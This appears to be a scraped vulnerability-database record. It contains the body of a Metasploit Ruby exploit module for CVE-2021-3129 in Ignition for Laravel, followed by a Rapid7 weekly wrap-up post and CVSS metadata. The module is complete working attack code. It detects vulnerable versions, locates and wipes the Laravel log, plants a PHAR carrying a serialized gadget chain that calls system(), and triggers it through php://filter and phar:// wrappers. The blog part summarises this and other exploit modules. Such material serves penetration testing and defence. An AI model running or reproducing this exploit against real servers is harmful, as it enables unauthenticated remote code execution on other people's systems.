\nregister_options([ \nOptString.new('TARGETURI', [true, 'Ignition execute solution path', '/_ignition/execute-solution']), \nOptString.new('LOGFILE', [false, 'Laravel log file absolute path']) \n]) \nend \n \ndef check \nprint_status(\"Checking component version to #{datastore['RHOST']}:#{datastore['RPORT']}\") \nres = send_request_cgi({ \n'uri' => normalize_uri(target_uri.path.to_s), \n'method' => 'PUT' \n}, 1) \n# Check whether it is using facade/ignition \n# If is using it should respond method not allowed \n# checking if debug mode is enable \nif res && res.code == 405 && res.body.match(/label:\"(Debug)\"/) \nvprint_status 'Debug mode is enabled.' \n# check version \nversions = JSON.parse( \nres.body.match(/.+\"report\":(\\{.*),\"exception_class/).captures.first.gsub(/$/, '}') \n) \nversion = Rex::Version.new(versions['framework_version']) \nvprint_status \"Found PHP #{versions['language_version']} running Laravel #{version}\" \n# to be sure that it is vulnerable we could try to cleanup the log files (invalid and valid) \n# but it is way more intrusive than just checking the version moreover we would need to call \n# the find_log_file method before, meaning four requests more. \nreturn Exploit::CheckCode::Appears if version <= Rex::Version.new('8.26.1') \nend \nreturn Exploit::CheckCode::Safe \nend \n \ndef exploit \n@logfile = datastore['LOGFILE'] || find_log_file \nfail_with(Failure::BadConfig, 'Log file is required, however it was neither defined nor automatically detected.') unless @logfile \n \nclear_log \nput_payload \nconvert_to_phar \nrun_phar \n \nhandler \n \nclear_log \nend \n \ndef find_log_file \nvprint_status 'Trying to detect log file' \nres = post Rex::Text.rand_text_alpha_upper(12) \nif res.code == 500 && res.body.match(%r{\"file\":\"(\\\\/[^\"]+?)/vendor\\\\/[^\"]+?}) \nlogpath = Regexp.last_match(1).gsub(/\\\\/, '') \nvprint_status \"Found directory candidate #{logpath}\" \nlogfile = \"#{logpath}/storage/logs/laravel.log\" \nvprint_status \"Checking if #{logfile} exists\" \nres = post logfile \nif res.code == 200 \nvprint_status \"Found log file #{logfile}\" \nreturn logfile \nend \nvprint_error \"Log file does not exist #{logfile}\" \nreturn \nend \nvprint_error 'Unable to automatically find the log file. To continue set LOGFILE manually' \nreturn \nend \n \ndef clear_log \nres = post \"php://filter/read=consumed/resource=#{@logfile}\" \n# guard clause when trying to exploit a target that is not vulnerable (set ForceExploit true) \nfail_with(Failure::UnexpectedReply, \"Log file #{@logfile} doesn't seem to exist.\") unless res.code == 200 \nend \n \ndef put_payload \npost format_payload \npost Rex::Text.rand_text_alpha_upper(2) \nend \n \ndef convert_to_phar \nfilters = %w[ \nconvert.quoted-printable-decode \nconvert.iconv.utf-16le.utf-8 \nconvert.base64-decode \n].join('|') \n \npost \"php://filter/write=#{filters}/resource=#{@logfile}\" \nend \n \ndef run_phar \npost \"phar://#{@logfile}/#{Rex::Text.rand_text_alpha_lower(4..6)}.txt\" \n# resp.body.match(%r{^(.*)\\n<!doctype html>}) \n# $1 ? print_good($1) : nil \nend \n \ndef body_template(data) \n{ \nsolution: 'Facade\\\\Ignition\\\\Solutions\\\\MakeViewVariableOptionalSolution', \nparameters: { \nviewFile: data, \nvariableName: Rex::Text.rand_text_alpha_lower(4..12) \n} \n}.to_json \nend \n \ndef post(data) \nsend_request_cgi({ \n'uri' => normalize_uri(target_uri.path.to_s), \n'method' => 'POST', \n'data' => body_template(data), \n'ctype' => 'application/json', \n'headers' => { \n'Accept' => '*/*', \n'Accept-Encoding' => 'gzip, deflate' \n} \n}) \nend \n \ndef generate_phar(pop) \nfile = Rex::Text.rand_text_alpha_lower(8) \nstub = \"<?php __HALT_COMPILER(); ?>\\r\\n\" \nfile_contents = Rex::Text.rand_text_alpha_lower(20) \nfile_crc32 = Zlib.crc32(file_contents) & 0xffffffff \nmanifest_len = 40 + pop.length + file.length \nphar = stub \nphar << [manifest_len].pack('V') # length of manifest in bytes \nphar << [0x1].pack('V') # number of files in the phar \nphar << [0x11].pack('v') # api version of the phar manifest \nphar << [0x10000].pack('V') # global phar bitmapped flags \nphar << [0x0].pack('V') # length of phar alias \nphar << [pop.length].pack('V') # length of phar metadata \nphar << pop # pop chain \nphar << [file.length].pack('V') # length of filename in the archive \nphar << file # filename \nphar << [file_contents.length].pack('V') # length of the uncompressed file contents \nphar << [0x0].pack('V') # unix timestamp of file set to Jan 01 1970. \nphar << [file_contents.length].pack('V') # length of the compressed file contents \nphar << [file_crc32].pack('V') # crc32 checksum of un-compressed file contents \nphar << [0x1b6].pack('V') # bit-mapped file-specific flags \nphar << [0x0].pack('V') # serialized File Meta-data length \nphar << file_contents # serialized File Meta-data \nphar << [Rex::Text.sha1(phar)].pack('H*') # signature \nphar << [0x2].pack('V') # signiture type \nphar << 'GBMB' # signature presence \n \nreturn phar \nend \n \ndef format_payload \n# rubocop:disable Style/StringLiterals \nserialize = \"a:2:{i:7;O:31:\\\"GuzzleHttp\\\\Cookie\\\\FileCookieJar\\\"\" \nserialize << \":1:{S:41:\\\"\\\\00GuzzleHttp\\\\5cCookie\\\\5cFileCookieJar\\\\00filename\\\";\" \nserialize << \"O:38:\\\"Illuminate\\\\Validation\\\\Rules\\\\RequiredIf\\\"\" \nserialize << \":1:{S:9:\\\"condition\\\";a:2:{i:0;O:20:\\\"PhpOption\\\\LazyOption\\\"\" \nserialize << \":2:{S:30:\\\"\\\\00PhpOption\\\\5cLazyOption\\\\00callback\\\";\" \nserialize << \"S:6:\\\"system\\\";S:31:\\\"\\\\00PhpOption\\\\5cLazyOption\\\\00arguments\\\";\" \nserialize << \"a:1:{i:0;S:#{payload.encoded.length}:\\\"#{payload.encoded}\\\";}}i:1;S:3:\\\"get\\\";}}}i:7;i:7;}\" \n# rubocop:enable Style/StringLiterals \nphar = generate_phar(serialize) \n \nb64_gadget = Base64.strict_encode64(phar).gsub('=', '') \npayload_data = b64_gadget.each_char.collect { |c| c + '=00' }.join \n \nreturn Rex::Text.rand_text_alpha_upper(100) + payload_data + '=00' \nend \n \nend \n`\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/165999/ignition_laravel_debug_rce.rb.txt"}], "rapid7blog": [{"lastseen": "2022-02-18T23:35:18", "description": "## Nagios XI web shell upload module\n\n![Metasploit Weekly Wrap-Up](https://blog.rapid7.com/content/images/2022/02/metasploit-sky.png)\n\nNew this week is a [Nagios Web Shell Upload module](<https://github.com/rapid7/metasploit-framework/pull/16150>) from Rapid7' own [Jake Baines](<https://github.com/jbaines-r7>), which exploits [CVE-2021-37343](<https://attackerkb.com/topics/zxpvqMqOHQ/cve-2021-37343?referrer=blog>). This module builds upon the existing [Nagios XI scanner](<https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/auxiliary/scanner/http/nagios_xi_scanner.md>) written by [Erik Wynter](<https://github.com/ErikWynter>). Versions of Nagios XI prior to 5.8.5 are vulnerable to a path traversal exploit through an admin-authenticated PHP web shell that results in code execution as the `www-data` user.\n\n## Ignition for Laravel RCE module\n\nCommunity contributor [heyder](<http://https://github.com/heyder>) [added a module](<https://github.com/rapid7/metasploit-framework/pull/16159>) which exploits [CVE-2021-3129](<https://attackerkb.com/topics/KP6wETuZyw/cve-2021-3129?referrer=blog>) in Ignition for Laravel, versions prior to 2.5.2. This module allows for unauthenticated remote code execution due to insecure usage of the PHP functions `file_get_contents()` and `file_put_contents()`.\n\n## New module content (3)\n\n * [Grandstream UCM62xx IP PBX WebSocket Blind SQL Injection Credential Dump](<https://github.com/rapid7/metasploit-framework/pull/16087>) by jbaines-r7, which exploits [CVE-2020-5723](<https://attackerkb.com/topics/RB012Xn6ww/cve-2020-5723?referrer=blog>) \\- A new module has been added which exploits [CVE-2020-5724](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=2020-5724>), a blind SQL injection in GrandStream UCM62xx IP PBX devices prior to firmware version 1.20.22 to dump usernames and passwords from the `users` table as an unauthenticated attacker. Successfully gathered credentials will be stored in Metasploit's credential database for use in further attacks.\n * [Nagios XI Autodiscovery Webshell Upload](<https://github.com/rapid7/metasploit-framework/pull/16150>) by Claroty Team82 and jbaines-r7, which exploits [CVE-2021-37343](<https://attackerkb.com/topics/zxpvqMqOHQ/cve-2021-37343?referrer=blog>) \\- This exploits a path traversal vulnerability in Nagios XI versions below `5.8.5` to achieve authenticated code execution as the `www-data` user.\n * [Unauthenticated remote code execution in Ignition](<https://github.com/rapid7/metasploit-framework/pull/16159>) by Heyder Andrade and ambionics, which exploits [CVE-2021-3129](<https://attackerkb.com/topics/KP6wETuZyw/cve-2021-3129?referrer=blog>) \\- This module exploits a vulnerability in Ignition before 2.5.2, as used in Laravel and other products, allows unauthenticated remote attackers to execute arbitrary code because of insecure usage of file_get_contents() and file_put_contents().\n\n## Enhancements and features\n\n * [#16076](<https://github.com/rapid7/metasploit-framework/pull/16076>) from [bcoles](<https://github.com/bcoles>) \\- This change adds the Meterpreter session type to the post/osx/gather/hashdump, hiding a warning when the module is run with a Meterpreter session.\n * [#16117](<https://github.com/rapid7/metasploit-framework/pull/16117>) from [zeroSteiner](<https://github.com/zeroSteiner>) \\- This makes some Log4Shell updates. It refactors the scanner to reduce duplicate code, and fix a couple of minor bugs.\n * [#16161](<https://github.com/rapid7/metasploit-framework/pull/16161>) from [smashery](<https://github.com/smashery>) \\- This PR updates the user agent strings for HTTP payloads to use the latest user agent strings for Chrome, Edge and Firefox on Windows and MacOS, as well as IPad.\n * [#16170](<https://github.com/rapid7/metasploit-framework/pull/16170>) from [sjanusz-r7](<https://github.com/sjanusz-r7>) \\- This change fixes the native_arch functionality on Java and ensures the native architecture is displayed when running `meterpreter > sysinfo` on Java.\n * [#16173](<https://github.com/rapid7/metasploit-framework/pull/16173>) from [AlanFoster](<https://github.com/AlanFoster>) \\- Adds additional `--no-readline` and `--readline` options to msfconsole for configuring the use of Readline suppor.t\n * [#16181](<https://github.com/rapid7/metasploit-framework/pull/16181>) from [AlanFoster](<https://github.com/AlanFoster>) \\- This adds a resource script for extracting the Meterpreter commands from currently open sessions.\n * [#16192](<https://github.com/rapid7/metasploit-framework/pull/16192>) from [zha0gongz1](<https://github.com/zha0gongz1>) \\- The session notifier has been updated to support notifying about new sessions via WeChat using the ServerJang API and servers.\n * [#16195](<https://github.com/rapid7/metasploit-framework/pull/16195>) from [darrenmartyn](<https://github.com/darrenmartyn>) \\- The `hp_dataprotector_cmd_exec.rb` module has been updated to support x64 payloads. This fixes a bug whereby x64 payloads were not supported as the `Arch` value was not set, leading it to default to x86 payloads only.\n\n## Bugs fixed\n\n * [#16174](<https://github.com/rapid7/metasploit-framework/pull/16174>) from [AlanFoster](<https://github.com/AlanFoster>) \\- This change fixes the mode specification on File.read required for ruby 3 on multiple modules.\n * [#16175](<https://github.com/rapid7/metasploit-framework/pull/16175>) from [AlanFoster](<https://github.com/AlanFoster>) \\- This change fixes the loadpath command summary to display the module types in alphabetical order.\n * [#16177](<https://github.com/rapid7/metasploit-framework/pull/16177>) from [AlanFoster](<https://github.com/AlanFoster>) \\- This change fixes the post(test/search) Meterpreter tests on OSX.\n * [#16184](<https://github.com/rapid7/metasploit-framework/pull/16184>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- This fixes a crash when running msfconsole on a Windows host in conjunction with the `sessions -u` command.\n * [#16194](<https://github.com/rapid7/metasploit-framework/pull/16194>) from [zeroSteiner](<https://github.com/zeroSteiner>) \\- This fixes a crash when using Metasploit's psexec module with the Command target.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` \nand you can get more details on the changes since the last blog post from \nGitHub:\n\n * [Pull Requests 6.1.29...6.1.30](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222022-02-09T14%3A46%3A38-06%3A00..2022-02-16T23%3A31%3A40-06%3A00%22>)\n * [Full diff 6.1.29...6.1.30](<https://github.com/rapid7/metasploit-framework/compare/6.1.29...6.1.30>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. \nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the \n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2022-02-18T21:24:12", "type": "rapid7blog", "title": "Metasploit Weekly Wrap-Up", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-5723", "CVE-2020-5724", "CVE-2021-3129", "CVE-2021-37343"], "modified": "2022-02-18T21:24:12", "id": "RAPID7BLOG:682AF2364002B8852065C1D4694ED089", "href": "https://blog.rapid7.com/2022/02/18/metasploit-wrap-up-149/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}

Exploit for Vulnerability in Facade Ignition

Description

Related